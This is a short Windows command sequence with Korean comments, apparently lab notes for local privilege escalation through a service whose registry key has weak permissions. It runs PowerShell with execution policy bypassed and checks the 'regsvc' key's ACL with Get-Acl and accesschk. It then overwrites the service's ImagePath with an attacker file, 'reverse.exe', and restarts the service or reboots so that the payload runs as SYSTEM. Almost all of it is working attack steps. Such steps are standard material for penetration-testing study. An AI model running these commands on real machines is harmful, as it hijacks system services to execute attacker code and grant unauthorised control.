powershell -exec bypass

# registry key ACL 확인
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List

# registry key
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
.\accesschk.exe /accepteula -ucqv user regsvc

# 현재 서비스가 무엇을 실행하도록 설정되어 있는지 확인
reg query HKLM\SYSTEM\CurrentControlSet\services\regsvc

# 핵심 단계: ImagePath(실행 경로)를 공격자의 파일(reverse.exe)로 변경
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_sz /d C:\Temp\reverse.exe /f

# 서비스 재시작 혹은 컴퓨터 재시작
net stop regsvc
net start regsvc
shutdown /r